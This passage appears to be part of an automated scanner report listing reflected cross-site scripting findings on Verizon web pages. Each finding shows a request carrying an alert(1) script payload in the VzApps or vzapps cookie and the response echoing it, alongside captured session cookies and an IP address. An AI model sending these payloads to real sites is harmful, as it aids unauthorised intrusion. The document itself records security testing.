ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX8e2e1'><script>alert(1)</script>1e4a8a0e625; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 104008
Expires: Sat, 20 Nov 2010 03:20:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:20:30 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8e2e1'><script>alert(1)</script>1e4a8a0e625; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: FAQs
</title><meta name="keywords" content="verizon high speed internet faqs, verizon dsl faqs, verizon faqs, verizon
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8E2E1'><SCRIPT>ALERT(1)</SCRIPT>1E4A8A0E625 ' />
...[SNIP]...

1.114. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighspeedInternet/FAQ/FAQ.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 8f3fb<script>alert(1)</script>2a9321f18e6 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighspeedInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX8f3fb<script>alert(1)</script>2a9321f18e6; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 104004
Expires: Sat, 20 Nov 2010 03:20:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:20:37 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8f3fb<script>alert(1)</script>2a9321f18e6; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: FAQs
</title><meta name="keywords" content="verizon high speed internet faqs, verizon dsl faqs, verizon faqs, verizon
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX8F3FB<SCRIPT>ALERT(1)</SCRIPT>2A9321F18E6 </DIV>
...[SNIP]...

1.115. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighspeedInternet/FAQ/FAQ.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 8b391<script>alert(1)</script>ee2a020046a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighspeedInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8b391<script>alert(1)</script>ee2a020046a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 104004
Expires: Sat, 20 Nov 2010 00:10:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:14 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8b391<script>alert(1)</script>ee2a020046a; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: FAQs
</title><meta name="keywords" content="verizon high speed internet faqs, verizon dsl faqs, verizon faqs, verizon
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX8B391<SCRIPT>ALERT(1)</SCRIPT>EE2A020046A </DIV>
...[SNIP]...

1.116. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighspeedInternet/FAQ/FAQ.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4dbaa'><script>alert(1)</script>f9ec6948bd6 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighspeedInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4dbaa'><script>alert(1)</script>f9ec6948bd6; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 104007
Expires: Sat, 20 Nov 2010 00:10:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX4dbaa'><script>alert(1)</script>f9ec6948bd6; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: FAQs
</title><meta name="keywords" content="verizon high speed internet faqs, verizon dsl faqs, verizon faqs, verizon
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX4DBAA'><SCRIPT>ALERT(1)</SCRIPT>F9EC6948BD6 ' />
...[SNIP]...

1.117. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5be15'><script>alert(1)</script>3c4e8eb8b2a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX5be15'><script>alert(1)</script>3c4e8eb8b2a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 199728
Expires: Sat, 20 Nov 2010 00:09:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:30 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:30 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:30 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:30 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:30 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX5BE15'><SCRIPT>ALERT(1)</SCRIPT>3C4E8EB8B2A ' />
...[SNIP]...

1.118. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 1817e<script>alert(1)</script>dabad9477e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX1817e<script>alert(1)</script>dabad9477e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 201232
Expires: Sat, 20 Nov 2010 00:09:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:54 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:54 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:54 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX1817E<SCRIPT>ALERT(1)</SCRIPT>DABAD9477E </DIV>
...[SNIP]...

1.119. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8c400'><script>alert(1)</script>5e2533e5388 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8c400'><script>alert(1)</script>5e2533e5388; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 199734
Expires: Sat, 20 Nov 2010 00:10:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:20 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:10:20 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:10:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:10:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:10:20 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8C400'><SCRIPT>ALERT(1)</SCRIPT>5E2533E5388 ' />
...[SNIP]...

1.120. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload abbca<script>alert(1)</script>27fec1e0170 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXabbca<script>alert(1)</script>27fec1e0170; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 201240
Expires: Sat, 20 Nov 2010 00:11:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:08 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:08 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:08 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:08 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:08 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXABBCA<SCRIPT>ALERT(1)</SCRIPT>27FEC1E0170 </DIV>
...[SNIP]...

1.121. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 33cf3<script>alert(1)</script>f0cf15e82f9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX33cf3<script>alert(1)</script>f0cf15e82f9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 308864
Expires: Sat, 20 Nov 2010 00:12:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:55 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:55 GMT; path=/
Set-Cookie: ContextInfo_State=TX33cf3<script>alert(1)</script>f0cf15e82f9; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:55 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:55 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:55 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX33CF3<SCRIPT>ALERT(1)</SCRIPT>F0CF15E82F9 </DIV>
...[SNIP]...

